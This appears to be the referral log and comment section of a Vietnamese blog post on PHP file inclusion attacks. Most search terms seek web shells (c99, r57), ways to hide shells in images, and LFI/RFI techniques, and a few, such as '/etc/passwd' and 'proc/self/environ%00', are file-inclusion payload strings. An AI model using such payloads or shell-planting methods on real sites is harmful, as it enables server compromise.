File Inclusion (www.google.com.vn) [Referral]
phimser (www.bing.com) [Referral]
chống shell c99 trên ubuntu apache (www.google.com.vn) [Referral]
tìm phát hiện file shell upload (www.google.com.vn) [Referral]
r57shell.txt (www.google.com.vn) [Referral]
tấn công upload file (www.google.com.vn) [Referral]
chèn shell vảo ảnh (www.google.com.vn) [Referral]
tan cong website bang shell (www.google.com.vn) [Referral]
Site:vnbrain.net c99.php.jpg (www.google.com.vn) [Referral]
vnbrain (vn.search.yahoo.com) [Referral]
/public_html/image @www "c99shell" (www.google.it) [Referral]
php shell script+local attack (www.google.com.vn) [Referral]
"shell.aspx" hacked (www.bing.com) [Referral]
include shell trong cms (www.google.com.vn) [Referral]
shell c99.jpg (www.google.com.vn) [Referral]
hàm loadfile trong sql (www.google.com.vn) [Referral]
phim hong cong (www.google.com.vn) [Referral]
index.php?file=/etc/passwd ubuntu server (www.google.com.vn) [Referral]
edjpgcom.exe cach dung (www.google.com.vn) [Referral]
phpshell (www.google.com.vn) [Referral]
config host chong local attack (www.google.com.vn) [Referral]
tan cong bang shell (www.google.com.vn) [Referral]
cu phap search tren bing.com (www.bing.com) [Referral]
loi failed to retrieve data for this request khi attach data vao sql (www.google.com.vn) [Referral]
download r57 + c99 (www.google.com.vn) [Referral]
file:///C:/Documents%20and%20Settings/NOVEMB/My%20Documents/... [Referral]
c99shell.txt là gì (www.google.com.vn) [Referral]
"shell vao hình" (www.google.com.vn) [Referral]
download shell c99 + vnbrain (www.google.com.vn) [Referral]
c99shell safemode:off safemode:on shellupload (www.google.com) [Referral]
gỡ bỏ c99.php trên server (www.google.com.vn) [Referral]
vnbrain.net remote (www.google.com.vn) [Referral]
tấn công hộp mail php (www.google.com.vn) [Referral]
tấn công file config (www.google.com.vn) [Referral]
r57 shell command (www.google.com.vn) [Referral]
file attack bị lỗi (www.google.com.vn) [Referral]
tấn công website dạng file inclusion (www.google.com.vn) [Referral]
hing anh (www.google.com.vn) [Referral]
echo+php+to+file (www.google.com.vn) [Referral]
File Inclusion (www.google.com.vn) [Referral]
sql injection site: vnbrain.net (www.google.com.vn) [Referral]
Loi inclusion (www.google.com.vn) [Referral]
"cach tấn công bằng webshell" (www.google.com.vn) [Referral]
shell script để quét và xóa đoạn mã độc đó khỏi tất cả các file .html (www.google.com.vn) [Referral]
config php.ini upload anh (www.google.com.vn) [Referral]
command shell r57 (www.google.com.vn) [Referral]
su dung remoteexec (www.google.com.vn) [Referral]
edjpgcom (www.google.com.vn) [Referral]
vnbrain c99 (www.google.com.vn) [Referral]
tan cong mysql (www.google.com.vn) [Referral]
c99,php trong jpg (www.google.com.vn) [Referral]
r57shell download (www.google.com.vn) [Referral]
down r57shell (www.google.com.vn) [Referral]
Viết một đoạn shell script để quét và xóa đoạn mã độc đó khỏi tất cả các file .html (www.google.com.vn) [Referral]
sử dụng shell bindport (www.google.com.vn) [Referral]
chen shell thong qua SQL injection (www.google.com.vn) [Referral]
iết một đoạn shell script để quét và xóa đoạn mã độc đó khỏi tất cả các file .html (www.google.com.vn) [Referral]
include shell sql injection (www.google.com.vn) [Referral]
edjpgcom shell (www.google.com.vn) [Referral]
để chống lại c99shell đã được mã hóa (www.google.com) [Referral]
đoạn shell script để quét và xóa đoạn mã độc đó khỏi tất cả các file .html (www.google.com.vn) [Referral]
mail site :vnbrain.net (www.google.com.vn) [Referral]
lam sao lay so lieu tu file *.jpg (www.google.com.vn) [Referral]
chèn (include) shell vào thằng database (www.google.com.vn) [Referral]
edjpgcom (www.google.com.vn) [Referral]
edjpgcom (www.google.com.vn) [Referral]
khai thác shell r57 (www.google.com.vn) [Referral]
http://search.timnhanh.com/web/PHIMSER [Referral]
mp3cted.co.cc email address (www.bing.com) [Referral]
remote file inclusion + guru (www.google.com.vn) [Referral]
upload shell qua lfi (www.google.com.vn) [Referral]
attack file (vn.search.yahoo.com) [Referral]
cách chống local attack trên windows (www.google.com.vn) [Referral]
lfi attack (www.google.com.vn) [Referral]
"php include file" + "file inclusion attack" (www.google.com.vn) [Referral]
http://vnbrain.net/forum/archive/index.php?t-833.html [Referral]
"sử dụng Shell C99" (www.google.com.vn) [Referral]
nh&#7919;ng file nh&#7841;y c&#7843;m khi attack 1 site (www.google.com) [Referral]
download phan mem inclusion (www.google.com.vn) [Referral]
xem phimser (vn.search.yahoo.com) [Referral]
link download Shell R57 (www.google.com.vn) [Referral]
nhan biet loi file inclusion (www.google.com.vn) [Referral]
c99shell.php la gi (www.google.com.vn) [Referral]
c99shell.php la gi (www.google.com.vn) [Referral]
local attack add php jpg (www.google.com.vn) [Referral]
chay r57 dinh vao anh (www.google.com.vn) [Referral]
safe_mode attack (www.google.com.vn) [Referral]
ip: 209.85.129.132 warning (www.bing.com) [Referral]
inject shell database nhung shell (www.google.com.vn) [Referral]
chen shell vao hinh anh (www.google.com.vn) [Referral]
phương pháp kiểm thử hộp trắng (www.google.com.vn) [Referral]
File Inclusion hack (www.google.com.vn) [Referral]
download r57.txt (www.google.com.vn) [Referral]
"download shell r57" (www.google.com.vn) [Referral]
phimser (search.conduit.com) [Referral]
edjpgcom.exe (www.google.com.vn) [Referral]
hacking upload r57 shell (www.google.com.vn) [Referral]
tấn công server shell r57 (www.google.com.vn) [Referral]
local file inclusion (www.google.com.vn) [Referral]
edjpgcom (www.google.com) [Referral]
remote file inclusion (www.google.com.vn) [Referral]
local attack sql injection (www.google.com.vn) [Referral]
tấn công local bằng c99 (www.google.com.vn) [Referral]
google com vn phimser (vn.yhs.search.yahoo.com) [Referral]
Remote File Inclusion tu khoa (www.google.com.vn) [Referral]
download r57shell viethoa (www.google.com.vn) [Referral]
"download shell r57" full (www.google.com.vn) [Referral]
tan cong truy nhap (www.google.com.vn) [Referral]
local file inclusion code (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
failed to retrieve data for this request (www.google.com.vn) [Referral]
remote file inclusion attack (www.google.com.vn) [Referral]
www/.google.phimser (search.yahoo.com) [Referral]
Failed to retrieve data for this request sql server (www.google.com.vn) [Referral]
google.phimser (search.yahoo.com) [Referral]
up shell trong cms (www.google.com.vn) [Referral]
kiểm thử hộp trắng (www.google.com.vn) [Referral]
ẩn code vào ảnh (www.google.com.vn) [Referral]
cach local php tu file hinh (www.google.com.vn) [Referral]
xoa shell c99 khoi host (www.google.com.vn) [Referral]
phimser (www.bing.com) [Referral]
http://mail.mobifone.com.vn/vn/?_task=mail&_action=show&_uid... [Referral]
File Inclusion (www.google.com.vn) [Referral]
vnbrain.net die (www.google.com.vn) [Referral]
tấn công LFI (www.google.com.vn) [Referral]
attack data dung sql server 2000 (www.google.com.vn) [Referral]
c99shell public_html (www.google.ps) [Referral]
c99shell public_html (www.google.ps) [Referral]
c99 r57 shell download (www.google.com.vn) [Referral]
phimser .com .vn (www.bing.com) [Referral]
search php shell in log file (www.google.com.vn) [Referral]
attack co so du lieu (www.google.com.vn) [Referral]
chèn shell vào sql (www.google.com.vn) [Referral]
viet thu cho chu bo doi (www.google.com) [Referral]
vnbrain bi tan cong (www.google.com.vn) [Referral]
shell c99 +download (www.google.com.vn) [Referral]
Vui lòng vào php.ini mở allow_url_fopen (www.google.com.vn) [Referral]
r57shell c99 shell download (www.google.com.vn) [Referral]
c99shell r57 download (www.google.com.vn) [Referral]
Download shell c99 (www.google.com.vn) [Referral]
download shellc99.sql (www.google.com.vn) [Referral]
phimser (www.google.com.vn) [Referral]
require khac gi inlude trong php (www.google.com) [Referral]
"download shell c99" (www.google.com.vn) [Referral]
http://translate.googleusercontent.com/translate_c?hl=pt-BR&... [Referral]
FILE Guru (www.google.com.vn) [Referral]
c99shell.txt (www.google.com.vn) [Referral]
command for R57 shell (www.google.com.vn) [Referral]
tan cong bang shell (www.google.com.vn) [Referral]
gan shell vao file anh (www.google.com.vn) [Referral]
chèn shell c99 vào image (www.google.com.vn) [Referral]
http://yandex.ru/yandsearch?text=shell+c99.jpg&lr=149 [Referral]
r57shell viet hoa (www.google.com.vn) [Referral]
attack shell jpg (www.google.com.vn) [Referral]
vnbrain.info/archive (search.conduit.com) [Referral]
download c99shell.txt (www.google.com.vn) [Referral]
local attack by shell code (www.google.com.vn) [Referral]
File Inclusion Attacks (www.google.com.vn) [Referral]
config php.ini chống shell (www.google.com.vn) [Referral]
thong tin vnbrain (www.google.com.vn) [Referral]
cần download r57shell chạy dưới dạng txt (www.google.com.vn) [Referral]
download + local attack + c99 (www.google.com.vn) [Referral]
các lệnh r57shell (www.google.com.vn) [Referral]
shellr57 zip (www.google.com) [Referral]
Chèn shell vào ảnh (www.google.com) [Referral]
vnbrain.vn (www.bing.com) [Referral]
edjpgcom c99 (www.google.pl) [Referral]
cach su dung edjpgcom (www.google.com.vn) [Referral]
loi Remote File include (www.google.com.vn) [Referral]
"download c99.php" (www.google.com.vn) [Referral]
Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
"up shell qua SQL" (www.google.com.vn) [Referral]
cấu hình chống shell c99 (www.google.com.vn) [Referral]
chống c99 (www.google.com.vn) [Referral]
Remote file inclusion là gì (www.google.com.vn) [Referral]
lam sao attack website.aspx (www.google.com.vn) [Referral]
cach attack qua file anh (www.google.com.vn) [Referral]
c99shell dowload (www.google.com.vn) [Referral]
cach chen shell vao .jpg vnbrain (www.google.com.vn) [Referral]
dowload C99 dang .txt (www.google.com.vn) [Referral]
"cach su dung shell" (www.google.com.vn) [Referral]
tim hieu remote file include (www.google.com.vn) [Referral]
r57 include shell (vn.search.yahoo.com) [Referral]
tan cong local attack (www.google.com.vn) [Referral]
hướng dẫn sử dụng edjpgcom.exe (www.google.com.vn) [Referral]
edjpgcom (www.google.com.vn) [Referral]
file inclusion attack (www.google.com.vn) [Referral]
su dung c99.php (www.google.com.vn) [Referral]
cach su dung edjpgcom (www.google.com.vn) [Referral]
download r57.txt (www.google.com.vn) [Referral]
cách attack csdl (www.google.com.vn) [Referral]
file inclusion attack (www.google.com.vn) [Referral]
r57.txt download (www.bing.com) [Referral]
shell c99.jpg (www.google.com.vn) [Referral]
" khong doc duoc file exe" (www.google.com.vn) [Referral]
remote file inclusion attacks (www.google.com.vn) [Referral]
vnbrain bi tan cong (www.google.com.vn) [Referral]
shellc99 php dowload (www.google.com.vn) [Referral]
download c99 txt (www.google.com.vn) [Referral]
cach hack local r57 (www.google.com.vn) [Referral]
edjpgcom (www.google.com.vn) [Referral]
tác dụng của shell r57 (www.google.com.vn) [Referral]
xem phimser (vn.search.yahoo.com) [Referral]
download c99.php (www.google.com.vn) [Referral]
"download shell r57" (www.google.com.vn) [Referral]
tools Local File Include (www.google.com.vn) [Referral]
Vui lòng vào php.ini mở allow_url_fopen (www.google.com.vn) [Referral]
safe off c99.php (www.google.com.vn) [Referral]
su dung c99 sau khi up load len hosting (www.google.com.vn) [Referral]
shell c99.jpg (www.google.com.vn) [Referral]
command shell c99 (www.google.com.vn) [Referral]
local attack using c99 (www.google.com.vn) [Referral]
phim ser (vn.yhs.search.yahoo.com) [Referral]
file jpg edjpgcom (www.google.com.vn) [Referral]
null byte attack (www.google.com.vn) [Referral]
nhung c99 vao file anh (www.google.com.vn) [Referral]
c99 php safe mode download (www.google.com.vn) [Referral]
"code php"+"upload shell"+"và" (www.google.com) [Referral]
PHP include local file jpg (www.google.com.vn) [Referral]
shell r57.txt (www.google.com.vn) [Referral]
edjpgcom hack (www.google.fr) [Referral]
r57shell.txt là gì (www.google.com) [Referral]
c99shell cach hack (www.google.com.vn) [Referral]
c99shell.php la gi (www.google.com.vn) [Referral]
Local/Remote File Include (www.google.com.vn) [Referral]
phương pháp tấn công Remote include file (www.google.com.vn) [Referral]
tan cong local (www.google.com.vn) [Referral]
phat hien shell chen trong code php (www.google.com.vn) [Referral]
phimser.com (vn.search.yahoo.com) [Referral]
edjpgcom.exeinclude .jpg (www.google.com.vn) [Referral]
cache:Tmykg1gRhf8J:www.guru.net.vn/CommentView,guid,1924e061-6881-453d-a841-5ec94c00591f.aspx edjpgcom.exeinclude .jpg (74.125.47.132) [Referral]
ngăn upload shell aspx (www.google.com.vn) [Referral]
file inclusion attack (www.google.com.vn) [Referral]
cách sử dụng edjpgcom (www.google.com.vn) [Referral]
chen shell vao anh bang edjpgcom.exe (www.google.com.vn) [Referral]
remote file inclusion attack (www.google.com.vn) [Referral]
cách hack File Inclusion (www.google.com.vn) [Referral]
cách chèn shell rfi (www.google.com) [Referral]
File Inclusion (www.google.com.vn) [Referral]
File Inclusion (www.google.com.vn) [Referral]
chống tấn công remote file include (www.google.com.vn) [Referral]
ubuntu local file inclusion (www.google.com.vn) [Referral]
download shellc99 (www.google.com.vn) [Referral]
attack các trang safe_mode on (www.google.com.vn) [Referral]
tao shell php tan cong (www.google.com.vn) [Referral]
lam sao de linux doc dc file *.exe (www.google.com.vn) [Referral]
local bang c99 (www.google.com.vn) [Referral]
c99shell chống (www.google.com.vn) [Referral]
Up file c99.php lên host (www.google.com.vn) [Referral]
r57 vnbrain (www.google.com) [Referral]
cách sử dụng edjpgcom (www.google.com.vn) [Referral]
google phimser.com (www.google.com.vn) [Referral]
Có thể lợi dụng việc cho upload file *.txt để up shell ... (www.google.com.vn) [Referral]
failed to retrieve data for this request (www.google.com.vn) [Referral]
R57shell.txt download o dau (www.google.com.vn) [Referral]
huong dan local bang c99shell (www.google.com.vn) [Referral]
tim hieu veb File inclusion (www.google.com.vn) [Referral]
phần mềm edjpgcom.zip (www.google.com.vn) [Referral]
c99shell.txt (www.google.com.vn) [Referral]
những file log quan trọng trên server bị attack (www.google.com.vn) [Referral]
phimser.com.vn (www.bing.com) [Referral]
http://feeds.feedburner.com/phamduchai [Referral]
edjpgcom.exe su dung (www.google.com.vn) [Referral]
attact csdl trong sql (www.bing.com) [Referral]
r57Shell (vn.search.yahoo.com) [Referral]
tat safe mode r57 (www.google.com.vn) [Referral]
huong dan su dung edjpgcom (www.google.com.vn) [Referral]
edjpgcom.exe (www.google.com.vn) [Referral]
c99.jpg.PHP (www.google.ps) [Referral]
cách chèn shell vào database (www.google.com.vn) [Referral]
tan cong bang PHP inclusion (www.google.com.vn) [Referral]
phimser. (search.yahoo.com) [Referral]
tan cong up file (www.google.com.vn) [Referral]
using edjpgcom (www.google.com.vn) [Referral]
web up shell cookie (www.google.com.vn) [Referral]
c99.php.jpg su dung (www.google.com.vn) [Referral]
includes shell vao file ảnh (www.google.com.vn) [Referral]
" cach tan cong SQL injection " (www.google.com.vn) [Referral]
files inclusion attacks (www.google.com.vn) [Referral]
"phương pháp kiểm thử hộp trắng" (White Box Testing) (www.google.com.vn) [Referral]
tim r57 shell include data mysql (www.google.com.vn) [Referral]
lenh chặn upshell trong linux (www.google.com.vn) [Referral]
attack local with r57 when server safe_mode on (www.google.com.vn) [Referral]
http://65.55.3.15/hrsint3/Judging.aspx?QueryID=1464843&UrlIn... [Referral]
how to uses shell r57, c99 (www.google.com.vn) [Referral]
phòng chống r57 c99 (www.google.com) [Referral]
c99.jpg (www.google.com.vn) [Referral]
"C99shell.txt" (www.google.com.vn) [Referral]
cài đặt c99shell như thế nào? (www.google.com.vn) [Referral]
r57shell viet hoa (www.google.com.vn) [Referral]
co ai Remote File Inclusion (www.google.com.vn) [Referral]
tấn công web bằng C99 (www.google.com.vn) [Referral]
remote file include hack (www.google.com.vn) [Referral]
cách dùng edjpgcom (www.google.com) [Referral]
huong dan edjpgcom.exe (www.google.com.vn) [Referral]
dinh shell c99.jpg lam sao chay (www.google.com.vn) [Referral]
remote file include (www.google.com.vn) [Referral]
lỗi "failed to retrieve data for this request" là gì (www.google.com.vn) [Referral]
"download shell c99" (www.google.com.vn) [Referral]
tấn công hệ thống Linux thông qua local hack (local attack) (www.google.com.vn) [Referral]
tan cong LFI va RFI ghi file len server (www.google.com.vn) [Referral]
tim hieu edjpgcom (www.google.com.vn) [Referral]
inclusions dich la (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
sql injection chan doan script vao database (www.google.com.vn) [Referral]
edjpgcom.exe (www.google.com.vn) [Referral]
edjpgcom.zip (www.google.com.vn) [Referral]
cach tan cong CMS tu xa (www.google.com.vn) [Referral]
local dung c99 (www.google.com) [Referral]
lỗi inclusion (www.google.com.vn) [Referral]
php file include attack (www.google.com.vn) [Referral]
hack loi Local File Include (www.google.com.vn) [Referral]
tấn công bắng Null Byte- Picture Upload (www.google.com.vn) [Referral]
owasp testing la gi? (www.google.com.vn) [Referral]
lỗi php file include trong local attack (www.google.com.vn) [Referral]
local attack đoạn code php (www.google.com.vn) [Referral]
Download Shell R57 vnbrain.net (www.google.com.vn) [Referral]
ham tan cong file .exe (www.google.com.vn) [Referral]
File Inclusion Attacks (www.google.com.vn) [Referral]
phong chong local attack (www.google.com.vn) [Referral]
r57shell.txt làm sao chạy (www.google.com.vn) [Referral]
Download R57 (www.google.com.vn) [Referral]
share shell c99.jpg (www.google.com.vn) [Referral]
r57shell.txt (www.google.com.vn) [Referral]
Null Byte - Picture Upload (www.google.com.vn) [Referral]
lfi attack rfi (www.google.com.vn) [Referral]
huong dan cai c99shell (www.google.com.vn) [Referral]
chèn (include) shell vào thẳng database (www.google.com.vn) [Referral]
cách chèn sheel vào header của photo (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
tan cong qua file inclusion (www.google.com.vn) [Referral]
"Remote File Inclusion" (www.google.com.vn) [Referral]
download shell c99 (www.google.com.vn) [Referral]
tan cong null byte (www.google.com.vn) [Referral]
null byte image upload php shell (www.google.com.vn) [Referral]
tan cong null byte injection (www.google.com.vn) [Referral]
tan cong attack (www.google.com.vn) [Referral]
"Remote File Inclusion" attack (www.google.com.vn) [Referral]
null byte picture upload (www.google.com.vn) [Referral]
download shell localhack via mysql (www.google.com.vn) [Referral]
phat hien tan cong qua log file trong windows (www.google.com.vn) [Referral]
failed to retrieve data for this request (www.google.com.vn) [Referral]
phimser (www.bing.com) [Referral]
r57shell khong up dir duoc (www.google.com.vn) [Referral]
attack null byte (www.google.com.vn) [Referral]
r57shell là gì (www.google.com.vn) [Referral]
http://www.fila.co.kr (www.google.com.vn) [Referral]
khai thác shell c99.php (www.google.com.vn) [Referral]
file chứa dữ liệu tấn công .txt (www.google.com.vn) [Referral]
cac cach tan cong file config.php (www.google.com.vn) [Referral]
nhận biết lỗi remote file include (www.google.com.vn) [Referral]
inurl: www.mobifone.com.vn passwd (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
file inlusion (www.google.com.vn) [Referral]
file inclusion rfi (www.google.com.vn) [Referral]
remote file include attack (www.google.com.vn) [Referral]
File Inclusion (www.google.com.vn) [Referral]
download shell r57.exe (www.google.com.vn) [Referral]
chống local file include (www.google.com.vn) [Referral]
rfi attack (www.google.com.vn) [Referral]
Remote File Inclusion hack (www.google.com.vn) [Referral]
r57.txt (www.google.com.vn) [Referral]
file inclussion demo (www.google.com.vn) [Referral]
demo remote file include download (www.google.com.vn) [Referral]
cach giau shell duoi jpg edjpgcom (www.google.com.vn) [Referral]
upload PHPshell From LFI (www.bing.com) [Referral]
share shell c99 đuôi jpg (www.google.com.vn) [Referral]
hack + include() [function.include]: Failed opening '' for inclusion (www.google.com.vn) [Referral]
phimser (search.yahoo.com) [Referral]
fsockopen() vào php.ini mở allow_url_fopen (www.google.com.vn) [Referral]
c99shell (www.google.com.vn) [Referral]
c99shell (www.google.com.vn) [Referral]
guru's blog hellboundhackers (www.google.hr) [Referral]
"remote file include include({$ (www.google.com.br) [Referral]
Hing a nh (ask.reference.com) [Referral]
tan cong shell r57 (www.google.com.vn) [Referral]
"add.php.jpg" (www.google.com.sg) [Referral]
"add.php.jpg" (www.google.com.sg) [Referral]
tool "c99.php" vnbrain (www.google.com.vn) [Referral]
tấn công file robots.txt (www.google.com.vn) [Referral]
chạy shell image (www.google.com) [Referral]
tự attack csdl (www.google.com.vn) [Referral]
http://www.google.com.vn/ [Referral]
+phimser (vn.search.yahoo.com) [Referral]
tìm hiểu lỗi file inclusion (www.google.com.vn) [Referral]
Local File include SQL (www.google.com.vn) [Referral]
lỗi failed to retrieve data for this request (www.google.com.vn) [Referral]
remote file include là gì (www.google.com.vn) [Referral]
xem phimser (vn.search.yahoo.com) [Referral]
down r57.txt (www.google.com.vn) [Referral]
huong dan cach hack bang c99 (www.google.com.vn) [Referral]
tấn công web bằng c99 (www.google.com.vn) [Referral]
edjpgcom.exe (www.google.com.vn) [Referral]
http://vnbrain.net/forum/showthread.php (www.google.com.vn) [Referral]
tấn công Remote File Include (www.google.com.vn) [Referral]
chạy shell attack trong SQL (www.google.com.vn) [Referral]
phimser (search.conduit.com) [Referral]
Cogiaothao.www.net (www.google.com) [Referral]
edjpgcom.exe (www.google.com.vn) [Referral]
phòng chống r57 (www.google.com.vn) [Referral]
r57shell download (vn.search.yahoo.com) [Referral]
failed retrieve data for request (www.google.com.vn) [Referral]
phimser (www.google.com) [Referral]
local file include (www.google.com.vn) [Referral]
Inject Shell Code In jpg Files (www.google.com.vn) [Referral]
huong dan hack LFI va RFI (www.google.com.vn) [Referral]
cách dùng edjpgcom.exe (www.google.com.vn) [Referral]
hing anh game (uk.ask.com) [Referral]
loi failed to retrieve data for this request (www.google.com.vn) [Referral]
chen code con shell vào trong comment của photo (www.google.com.vn) [Referral]
share r57shell viet hoa (www.google.com.vn) [Referral]
chan nguon.com (www.bing.com) [Referral]
Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
cách chặn tấn công kiểu R57 (www.google.com.vn) [Referral]
Search tool local R57 (www.google.com.vn) [Referral]
edjpgcom php c99shell (www.google.com.hk) [Referral]
edjpgcom c99 upload shell (www.google.com.hk) [Referral]
Hướng Dẫn Tấn công File Inclusion (File Inclusion Attacks) (www.google.com.vn) [Referral]
huong dan local attack bang c99 (www.google.com.vn) [Referral]
cách attack shell (www.google.com.vn) [Referral]
rootkit php jpg edjpgcom (www.google.com.vn) [Referral]
chống shell R57 c99 (www.google.com.vn) [Referral]
r57 su dung guru (www.google.com.vn) [Referral]
http://translate.google.co.in/translate_p?hl=hi&langpair=en%... [Referral]
lỗi inclusion (www.google.com.vn) [Referral]
Huong dan su dung shell c99 .php (www.bing.com) [Referral]
su khoi nguon.com.vn (www.bing.com) [Referral]
c99shell (vn.search.yahoo.com) [Referral]
c99shell crack (vn.search.yahoo.com) [Referral]
shell c99 crack (vn.search.yahoo.com) [Referral]
phim ser (vn.m.yahoo.com) [Referral]
lfi & rfi (www.google.com.vn) [Referral]
file r57.txt lam sao chay (www.google.com.vn) [Referral]
shell vnbrain (www.google.com.vn) [Referral]
chèn mã độc vào file .aspx (www.google.com.vn) [Referral]
link tai c99 shell (www.google.com.vn) [Referral]
gan vao c99 picture (www.google.com.vn) [Referral]
File_inclusion (www.google.com.vn) [Referral]
Remote file include (RFI) (www.google.com.vn) [Referral]
download C99.php (www.google.com.vn) [Referral]
file inclusion (www.google.com.vn) [Referral]
cam chay shell script tren IIS (www.google.com.vn) [Referral]
edjpgcom.zip (www.google.com.vn) [Referral]
download c99.php (www.google.com.vn) [Referral]
tan cong database 1 trang web php (www.google.com.vn) [Referral]
proc/self/environ%00 80 (www.google.com.vn) [Referral]

21 Tháng Ba 2009 12:48:35 SA (SE Asia Standard Time, UTC+07:00)
Cảm ơn về bài viết hay. Tuy nhiên mình không biết nhiều về hack nên mình muốn hỏi là lỗi này có liên quan tới việc upload 1 file lên server, ví dụ upload được 1 file php lên server và chạy file đó hông ta? :D
21 Tháng Ba 2009 11:00:30 CH (SE Asia Standard Time, UTC+07:00)
chào bạn!
Lỗi này nguy hiểm ở chỗ là không cần upload file lên vẫn hack được web, server. Tất nhiên sau khi có shell qua remote file thường attacker sẽ upload file shell thực sự lên để tiện làm các việc khác.
Bản thân các shell, hack tool đều có chức năng upload. Việc upload được hay không là do việc đặt permision cho các thư mục có hợp lý hay không. Thông thường thì đều upload được vì các site hay có thư mục như upload, images,... để có thể upload file, ảnh qua phần quản trị. Lỗi này thực sự rất nguy hiểm. Các lập trình viên thường ko biết nên không có ý thức lập trình chặt chẽ. Việc khai báo biến và khởi tạo biến là rất quan trọng, đây là điều rất cơ bản trong lập trình, nhưng ko mấy lập trình viên tuân theo.
Rất vui nếu bài này có ích cho bạn :)
31 Tháng Mười 2009 11:30:01 CH (SE Asia Standard Time, UTC+07:00)
Cho em hỏi tại sao server lại có thể chạy file .txt (ở ví dụ trên là R57.txt) ? Và lỗi nào nguy hiểm hơn ạ ? :) !
Họ tên
E-mail
(sẽ hiển thị gravatar theo email của bạn)
Trang chủ
Bộ gõ Tắt TELEX VNI
Ý kiến (Không dùng HTML)  

Nhập mã kiểm tra :(chống xì-pum ý mà):